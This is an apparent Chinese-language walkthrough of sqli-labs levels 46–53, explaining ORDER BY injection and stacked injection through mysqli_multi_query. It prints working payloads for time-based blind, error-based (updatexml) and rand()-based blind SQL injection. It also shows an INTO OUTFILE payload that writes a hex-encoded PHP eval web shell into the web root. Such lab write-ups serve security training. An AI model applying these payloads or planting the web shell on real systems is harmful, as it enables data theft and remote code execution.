less46~49 order by注入
SQL语句$sql = “SELECT * FROM users ORDER BY $id”;我们可利用 order by 后的一些参数进行注入。
1.时间盲注
playload: ?sort=1 and if( left( (database()), 1) ='s' ,1,sleep(3))--+
2.报错注入
playload:?sort=1 and updatexml(1,( select group_concat(0x7e,username,password) from security.users ),1)--+
3.rand()盲注
order by rand(true); order by rand(false); 返回不同进行盲注。原理是 order by rand()会随机给每个数据生成一个随机数,然后按照随机数排序,true和false实际上转成了整形的1和0作为rand()的种子,这样给每一列都会成一个固定的数,然后根据这个数来排序,所以结果会不同。
playload: ?sort=rand(ascii(left(database(),1))=115)--+
根据rand(1)和rand(0)的结果判断SQL语句是否执行成功
回显结果一致则SQL语句正确。这几关的解法大致一致,区别在于:less46id无包裹,less47单引号包裹,less48不输出报错信息,less49不输出报错信息且id单引号包裹
总结拓展
另外的解法可以利用文件操作将信息导出。或将一句话木马等导入到文件指中
playload: 1 into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-42\\1.php' --+
将恶意代码写入
playload: 1 into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-42\\1.php' lines terminated by 0x。。 --+
注意恶意代码进行 16 进制转换例如:3c3f70687020406576616c28245f706f73745be2809c6d696d61e2809d5d293f3e这是一句话木马<?php @eval($_post[“mima”])?>
less49~53
mysqli_fetch_assoc($ result) 函数从结果集中取得一行作为关联数组。result 必需。规定由 mysqli_query()、mysqli_store_result() 或 mysqli_use_result() 返回的结果集标识符。
mysqli_multi_query($ connection,$query) 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
connection 必需。规定要使用的 MySQL 连接。
query 必需。规定一个或多个查询,用分号进行分隔。
区别在于 mysqli_multi_query()可以执行多个 sql 语句,而 mysqli_query()只能执行 一个 sql 语句,那么我们此处就可以执行多个 sql 语句进行注入, 因此这几关就可以使用堆叠注入,在此不作赘述
这几关的区别在于less50id无包裹,51单引号包裹,52无报错信息输出,53单引号包裹且无报错信息输出